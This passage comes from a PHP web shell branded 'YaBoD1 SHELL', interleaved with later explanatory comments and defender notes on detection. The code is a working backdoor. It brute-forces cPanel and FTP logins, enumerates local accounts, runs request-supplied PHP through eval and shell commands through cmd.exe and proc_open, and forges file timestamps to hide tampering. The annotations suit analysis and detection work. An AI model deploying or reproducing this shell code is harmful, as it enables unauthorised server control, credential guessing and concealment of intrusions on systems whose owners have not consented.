1294}
1295print " <div align='center'>
1296<form method='post' style='border: 1px solid #000000'><br><br>
1297<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
1298<b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
1299<div align='center'><br>
1300<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
1301<tr>
1302<td align='center'>
1303<b>Username</b></td>
1304<td>
1305<p align='center'>
1306<b>Password</b></td>
1307</tr>
1308</table>
1309<p align='center'>
1310<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
1311$i = 0;
1312while ($i < 60000) {
1313
1314 $line = posix_getpwuid($i);
1315 if (!empty($line)) {
1316
1317 while (list ($key, $tmt_etcpwd) = each($line)){
1318 echo "".$tmt_etcpwd."\n";
1319 break;
1320 }
1321
1322 }
1323
1324 $i++;
1325}
1326echo "
1327</textarea>
1328<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
1329<br>
1330<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
1331<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
1332</td></tr></table></td></tr></form><p align= 'left'>";
1333?>
1334<?php
// ftp_check(): tries one username/password pair against ftp://$host through cURL.
//   $host    target host name, taken from the request by the caller
//   $user    user name to try
//   $pass    password to try
//   $timeout connect timeout in seconds
// Returns nothing. cURL error 28 (operation timed out) prints a message and ends the
// whole request with exit; error 0 is treated as a valid login and the pair is
// printed into the page; any other error falls through without output.
// The function is declared inside the "brute" branch, so it exists only when that
// branch runs.
// Defender note: every call is a separate FTP login from this host, so the target's
// FTP log shows a run of failed logins from the web server's address, and the host
// itself shows outbound port-21 connections made by the PHP process. Login rate
// limiting or lockout on the target and egress filtering on the web host both
// interrupt it.
// NOTE(review): p() is defined outside this excerpt; presumably it prints its argument.
1335function ftp_check($host,$user,$pass,$timeout){
1336$ch = curl_init();
1337curl_setopt($ch, CURLOPT_URL, "ftp://$host");
1338curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1339curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1340curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
1341curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1342curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1343curl_setopt($ch, CURLOPT_FAILONERROR, 1);
// The listing returned by the server is stored but never read; only the error code
// is inspected.
1344$data = curl_exec($ch);
1345if ( curl_errno($ch) == 28 ) {
1346
1347print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1348exit;}
1349
1350elseif ( curl_errno($ch) == 0 ){
1351
// The credentials are written into the response body and into a URL of the form
// http://user:pass@host:2082.
1352p("<b>[ b4@live.fr ]# </b>
1353<b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
1354}
1355curl_close($ch);}
1356
// cpanel_check(): tries one username/password pair with HTTP Basic authentication
// against http://$host:2082 through cURL.
//   $host    target host name, taken from the request by the caller
//   $user    user name to try
//   $pass    password to try
//   $timeout connect timeout in seconds
// Returns nothing. CURLOPT_FAILONERROR is set, so the request counts as failed when
// cURL reports an error for it; cURL error 28 (operation timed out) prints a message
// and ends the whole request with exit; error 0 is treated as a valid login and the
// pair is printed into the page.
// Defender note: the requests go out over plain HTTP to port 2082 with an
// Authorization: Basic header, one request per pair. Repeated authentication
// failures on that port from a single address in the target's access log, and
// outbound connections to port 2082 from a web host's PHP process, are the signals
// to alert on.
// NOTE(review): p() is defined outside this excerpt; presumably it prints its argument.
1357function cpanel_check($host,$user,$pass,$timeout){
1358$ch = curl_init();
1359curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
1360curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1361curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1362curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1363curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1364curl_setopt($ch, CURLOPT_FAILONERROR, 1);
// The response body is stored but never read; only the error code is inspected.
1365$data = curl_exec($ch);
1366if ( curl_errno($ch) == 28 ) {
1367print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1368exit;}
1369elseif ( curl_errno($ch) == 0 ){
1370
1371p("<b>[ b4@live.fr ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");}curl_close($ch);}
1372
// Driver for the credential-guessing form. $submit, $users, $pass, $target and
// $option are read from $_REQUEST earlier in this branch; $target defaults to
// 'localhost' when empty.
// Every user name is combined with every password (one line each, trimmed), and each
// pair is one network login attempt made synchronously inside this HTTP request.
// Defender note: because the work is done within a single request with no time
// limit, a long-running POST to the script with action=brute and fields users,
// passwords, target and option is visible in the web server's access log and in its
// list of active workers.
1373if(isset($submit) && !empty($submit)){
1374
1375$userlist = explode ("\n" , $users );
// $passlist is reused here: it held the built-in default list that pre-fills the
// form, and now holds the submitted list.
1376$passlist = explode ("\n" , $pass );
1377p('<b>[ attack@yabod ]# Attacking ...</font></b><br>');
1378foreach ($userlist as $user) {
1379$_user = trim($user);
1380foreach ($passlist as $password ) {
1381$_pass = trim($password);
// Any other $option value leaves the pair untried.
1382if($option == "ftp"){
1383ftp_check($target,$_user,$_pass,$connect_timeout);
1384}
1385if ($option == "cpanel")
1386{
1387cpanel_check($target,$_user,$_pass,$connect_timeout);
1388}
1389}
1390}
1391}
1392
1393 formfoot();
1394}
1395
1396
1397
1398
1399
1400
1401elseif ($action == 'etcpwd') {
1402formhead(array('title'=>'Get /etc/passwd'));
1403 makehide('action','etcpwd');
1404 makehide('dir',$nowpath);
// Local account enumeration. For every UID from 0 to 59999 the code asks
// posix_getpwuid() for the account record and prints the first element of the
// returned array (the account name) on its own line inside a textarea. Despite the
// form title "Get /etc/passwd" the file itself is never opened; the data comes from
// the posix extension.
// The names are echoed without HTML escaping.
// each() was removed in PHP 8.0, so this loop only runs on older interpreters.
// Defender note: listing posix_getpwuid in disable_functions, or not loading the
// posix extension for web-facing PHP, prevents this enumeration; the script reads
// disable_functions at start-up for its own status display.
1405$i = 0;
1406 echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
1407while ($i < 60000) {
1408
// Returns false for UIDs that have no account; those are skipped by the empty() test.
1409 $line = posix_getpwuid($i);
1410 if (!empty($line)) {
1411
// Print only the first field of the record, then leave the inner loop.
1412 while (list ($key, $tmt_etcpwd) = each($line)){
1413 echo "".$tmt_etcpwd."\n";
1414 break;
1415 }
1416
1417 }
1418
1419 $i++;
1420}
1421 echo "</textarea></p>";
1422 formfoot();
1423}
1424
1425elseif ($action == 'eval') {
// SECURITY: request-supplied PHP is executed verbatim. $phpcode is a GET/POST
// parameter (the loop at the top of the file copies request keys into variables);
// nothing restricts what it may contain.
// Defender note: eval is a language construct, so disable_functions does not cover
// it. Requests to the script that carry action=eval together with a phpcode field
// are the pattern to look for in access logs, request-body captures or WAF rules.
1426 $phpcode = trim($phpcode);
1427 if($phpcode){
// Input without any "<?" is wrapped in PHP tags so that it runs as code.
1428 if (!preg_match('#<\?#si', $phpcode)) {
1429 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1430 }
// The leading "?>" leaves PHP mode first, so the submitted text is processed like
// the contents of a .php file: anything outside its own tags is sent as output.
1431 eval("?".">$phpcode<?");
1432 }
1433 formhead(array('title'=>'Eval PHP Code'));
1434 makehide('action','eval');
1435 maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
1436 p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
1437 formfooter();
1438}//end eval
1439
1440elseif ($action == 'editfile') {
1441 if(file_exists($opfile)) {
1442 $fp=@fopen($opfile,'r');
1443 $contents=@fread($fp, filesize($opfile));
1444 @fclose($fp);
1445 $contents=htmlspecialchars($contents);
1446 }
1447 formhead(array('title'=>'Create / Edit File'));
1448 makehide('action','file');
1449 makehide('dir',$nowpath);
1450 makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
1451 maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
1452 formfooter();
1453}//end editfile
1454
1455elseif ($action == 'newtime') {
1456 $opfilemtime = @filemtime($opfile);
1457 //$time = strtotime("$year-$month-$day $hour:$minute:$second");
1458 $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
1459 formhead(array('title'=>'Clone file was last modified time'));
1460 makehide('action','file');
1461 makehide('dir',$nowpath);
1462 makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1463 makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
1464 formfooter();
1465 formhead(array('title'=>'Set last modified'));
1466 makehide('action','file');
1467 makehide('dir',$nowpath);
1468 makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1469 p('<p>Instead »');
1470 p('year:');
1471 makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
1472 p('month:');
1473 makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
1474 p('day:');
1475 makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
1476 p('hour:');
1477 makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
1478 p('minute:');
1479 makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
1480 p('second:');
1481 makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
1482 p('</p>');
1483 formfooter();
1484}//end newtime
1485
1486elseif ($action == 'shell') {
1487 if (IS_WIN && IS_COM) {
1488 if($program && $parameter) {
1489 $shell= new COM('Shell.Application');
1490 $a = $shell->ShellExecute($program,$parameter);
1491 m('Program run has '.(!$a ? 'success' : 'fail'));
1492 }
1493 !$program && $program = 'c:\windows\system32\cmd.exe';
1494 !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
1495 formhead(array('title'=>'Execute Program'));
1496 makehide('action','shell');
1497 makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
1498 p('<p>');
1499 makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
1500 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1501 p('</p>');
1502 formfoot();
1503 }
1504 formhead(array('title'=>'Execute Command'));
1505 makehide('action','shell');
1506 if (IS_WIN && IS_COM) {
1507 $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
1508 makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
1509 }
1510 p('<p>');
1511 makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
1512 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1513 p('</p>');
1514 formfoot();
1515
// Command execution for the "shell" action. $command and $execfunc are request
// parameters; the command string is passed on unchanged and its output is echoed
// without escaping inside a <pre> block.
// Three paths exist:
//   - execfunc=wscript on Windows with COM available: WScript.shell runs
//     "cmd.exe /c <command>" and its standard output is read in full;
//   - execfunc=proc_open on Windows with COM available: the interpreter named by
//     COMSPEC is started and the command is written to its standard input;
//   - everything else: the execute() helper.
// Defender note: in each case the command interpreter runs as a child of the web
// server or PHP process, which is what process-creation logging should alert on.
// Listing proc_open and the other process-spawning functions in disable_functions,
// and not loading the COM extension, close these paths. In the request log the
// feature appears as action=shell with a command field.
// NOTE(review): execute() and p() are defined outside this excerpt; execute()
// presumably runs the command through one of PHP's process functions and returns
// the output.
1516 if ($command) {
1517 p('<hr width="100%" noshade /><pre>');
1518 if ($execfunc=='wscript' && IS_WIN && IS_COM) {
1519 $wsh = new COM('WScript.shell');
1520 $exec = $wsh->exec('cmd.exe /c '.$command);
1521 $stdout = $exec->StdOut();
1522 $stroutput = $stdout->ReadAll();
1523 echo $stroutput;
1524 } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
// stdin, stdout and stderr of the child are all attached to pipes.
1525 $descriptorspec = array(
1526 0 => array('pipe', 'r'),
1527 1 => array('pipe', 'w'),
1528 2 => array('pipe', 'w')
1529 );
1530 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1531 if (is_resource($process)) {
// Feed the command, then "exit" so the interpreter terminates and the pipes close.
1532 fwrite($pipes[0], $command."\r\n");
1533 fwrite($pipes[0], "exit\r\n");
1534 fclose($pipes[0]);
// stdout is drained completely before stderr is read.
1535 while (!feof($pipes[1])) {
1536 echo fgets($pipes[1], 1024);
1537 }
1538 fclose($pipes[1]);
1539 while (!feof($pipes[2])) {
1540 echo fgets($pipes[2], 1024);
1541 }
1542 fclose($pipes[2]);
1543 proc_close($process);
1544 }
1545 } else {
1546 echo(execute($command));
1547 }
1548 p('</pre>');
1549 }
1550}//end shell
1551
1552elseif ($action == 'phpenv') {
1553 $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1554 $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1555 !$dis_func && $dis_func = 'No';
1556 $info = array(
1557 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
1558 2 => array('Server Domain',$_SERVER['SERVER_NAME']),
1559 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
1560 4 => array('Server OS',PHP_OS),
1561 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
1562 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
1563 7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
1564 8 => array('PHP run mode',strtoupper(php_sapi_name())),
1565 9 => array('The file path',__FILE__),
1566
1567 10 => array('PHP Version',PHP_VERSION),
1568 11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
1569 12 => array('Safe Mode',getcfg('safe_mode')),
1570 13 => array('Administrator',$adminmail),
1571 14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
1572 15 => array('enable_dl',getcfg('enable_dl')),
1573 16 => array('display_errors',getcfg('display_errors')),
1574 17 => array('register_globals',getcfg('register_globals')),
1575 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
1576 19 => array('memory_limit',getcfg('memory_limit')),
1577 20 => array('post_max_size',getcfg('post_max_size')),
1578 21 => array('upload_max_filesize',$upsize),
1579 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
1580 23 => array('disable_functions',$dis_func),
1581 );
1582
1583 if($phpvarname) {
1584 m($phpvarname .' : '.getcfg($phpvarname));
1585 }
1586
1587 formhead(array('title'=>'Server environment'));
1588 makehide('action','phpenv');
1589 makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
1590 formfooter();
1591
1592 $hp = array(0=> 'Server', 1=> 'PHP');
1593 for($a=0;$a<2;$a++) {
1594 p('<h2>'.$hp[$a].' »</h2>');
1595 p('<ul class="info">');
1596 if ($a==0) {
1597 for($i=1;$i<=9;$i++) {
1598 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1599 }
1600 } elseif ($a == 1) {
1601 for($i=10;$i<=23;$i++) {
1602 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
1603 }
1604 }
1605 p('</ul>');
1606 }
1607}//end phpenv
1608
1609else {
1610 m('Undefined Action');
1611}
1612
1613?>
1614</td></tr></table>
1615<div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
1616 <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
1617 Copyright (C) 2010-2011 <B>[S4T]</B> - Develop by <a href=b4@live.fr target=_blank><B>YaBoD1</B></a> - <B>YaBoD1.COM</B> All Rights Reserved.
1618</div>
1619</body>
1620</html>
1621
1622<?php
1623
1624/*======================================================
1625Show info shell
1626======================================================*/
1627
/**
 * Print a status message inside a centred, bordered box.
 *
 * The message is written as-is, without HTML escaping: callers in this file pass
 * ready-made markup (links) as well as raw mysql_error() text.
 *
 * @param string $msg Text or HTML fragment to display.
 */
function m($msg) {
    $open = '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
    echo $open.$msg.'</div>';
}
/**
 * Set a cookie using the settings held in the global $admin array.
 *
 * The expiry time is the global $timestamp plus $life; a $life of 0 selects
 * $admin['cookielife']. The Secure flag is set only when the request arrived on
 * port 443. No HttpOnly argument is passed to setcookie().
 *
 * @param string $key    Cookie name, without prefix.
 * @param string $value  Cookie value.
 * @param int    $life   Lifetime in seconds relative to $timestamp (negative expires it).
 * @param int    $prefix When truthy, $admin['cookiepre'] is prepended to the name.
 */
function scookie($key, $value, $life = 0, $prefix = 1) {
    global $admin, $timestamp, $_SERVER;

    $name = $key;
    if ($prefix) {
        $name = $admin['cookiepre'].$key;
    }
    if (!$life) {
        $life = $admin['cookielife'];
    }
    $secure = ($_SERVER['SERVER_PORT'] == 443) ? 1 : 0;

    setcookie($name, $value, $timestamp + $life, $admin['cookiepath'], $admin['cookiedomain'], $secure);
}
/**
 * Build the "Pages: ..." navigation strip for the table browser.
 *
 * Returns an empty string when all rows fit on one page. Otherwise it returns a
 * <p> element holding First/Prev links, a window of at most ten page numbers, and
 * Next/Last links. Every link calls the page's settable() JavaScript function.
 *
 * $tablename is inserted into a single-quoted JavaScript string inside the href
 * without any escaping.
 *
 * @param int    $num       Total number of rows.
 * @param int    $perpage   Rows per page.
 * @param int    $curpage   Current page number (1-based).
 * @param string $tablename Table name passed to settable().
 * @return string HTML fragment, or '' when no paging is needed.
 */
function multi($num, $perpage, $curpage, $tablename) {
    // Nothing to paginate when everything fits on one page.
    if (!($num > $perpage)) {
        return '';
    }

    $window = 10;   // maximum number of page links shown at once
    $lead = 5;      // page links kept in front of the current page
    $pages = @ceil($num / $perpage);
    $anchor = '<a href="javascript:settable(\'%s\', \'\', %s);">%s</a>';

    // Work out the first and last page number of the visible window.
    if ($window > $pages) {
        $from = 1;
        $to = $pages;
    } else {
        $from = $curpage - $lead;
        $to = $curpage + $window - $lead - 1;
        if ($from < 1) {
            $to = $curpage + 1 - $from;
            $from = 1;
            if (($to - $from) < $window && ($to - $from) < $pages) {
                $to = $window;
            }
        } elseif ($to > $pages) {
            $from = $curpage - $pages + $to;
            $to = $pages;
            if (($to - $from) < $window && ($to - $from) < $pages) {
                $from = $pages - $window + 1;
            }
        }
    }

    $html = '';
    if ($curpage - $lead > 1 && $pages > $window) {
        $html .= sprintf($anchor, $tablename, 1, 'First').' ';
    }
    if ($curpage > 1) {
        $html .= sprintf($anchor, $tablename, $curpage - 1, 'Prev').' ';
    }
    for ($n = $from; $n <= $to; $n++) {
        if ($n == $curpage) {
            // The current page is shown as plain text, not as a link.
            $html .= $n.' ';
        } else {
            $html .= sprintf($anchor, $tablename, $n, '['.$n.']').' ';
        }
    }
    if ($curpage < $pages) {
        $html .= sprintf($anchor, $tablename, $curpage + 1, 'Next');
    }
    if ($to < $pages) {
        $html .= ' '.sprintf($anchor, $tablename, $pages, 'Last');
    }

    return $html ? '<p>Pages: '.$html.'</p>' : '';
}
1675// Login page
// loginpage(): prints the static HTML of the password prompt. It takes no arguments
// and returns nothing. The form posts back to the current URL (empty action) with
// two fields: "password" and a hidden "doing" field set to "login".
// Defender note: the fixed strings in this markup (the page title, the
// "==[ YaBoD1 SHELL ]==" banner, the background image URL and the doing=login field)
// are stable content signatures for file scanning and for matching HTTP responses.
1676function loginpage() {
1677?>
1678<html>
1679<head>
1680
1681<body bgcolor=black background=http://i382.photobucket.com/albums/oo263/vnhacker/bg-1.jpg>
1682
1683 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1684<title>yabod1 SHELL - Develop by yabod1</title>
1685<style type="text/css">
1686A:link {text-decoration: none; color: green }
1687A:visited {text-decoration: none;color:red}
1688A:active {text-decoration: none}
1689A:hover {text-decoration: underline; color: green;}
1690input, textarea, button
1691{
1692 font-size: 9pt;
1693 color: #ccc;
1694 font-family: verdana, sans-serif;
1695 background-color: #202020;
1696 border-left: 1px solid #74A202;
1697 border-top: 1px solid #74A202;
1698 border-right: 1px solid #74A202;
1699 border-bottom: 1px solid #74A202;
1700}
1701
1702</style>
1703
1704 <BR><BR>
1705<div align=center >
1706<fieldset style="border: 1px solid rgb(69, 69, 69); padding: 4px;width:450px;bgcolor:white;align:center;font-family:tahoma;font-size:10pt"><legend><font color=red><B>Login</b></font></legend>
1707
1708<div>
1709<font color=gray>
1710<font color=yellow>==[ <B>YaBoD1 SHELL</B> ]== </font><BR><BR>
1711
1712<form method="POST" action="">
1713 <span style="font:10pt tahoma;">Password: </span><input name="password" type="password" size="20">
1714 <input type="hidden" name="doing" value="login">
1715 <input type="submit" value="Login">
1716 </form>
1717<BR>
1718<?php
// $err_mess is neither a parameter nor declared global and is never assigned inside
// this function, so this statement prints an empty string.
1719echo "".$err_mess."";
1720?>
1721
1722 <B><font color=red>
1723<a href=http://www.yabod1.com target=_blank>YaBod1 sniper algeria</a><BR></b>
1724
1725
1726
1727
1728
1729</div>
1730
1731
1732 </fieldset>
1733
1734
1735
1736</head>
1737</html>
1738<?php
1739}
1740?>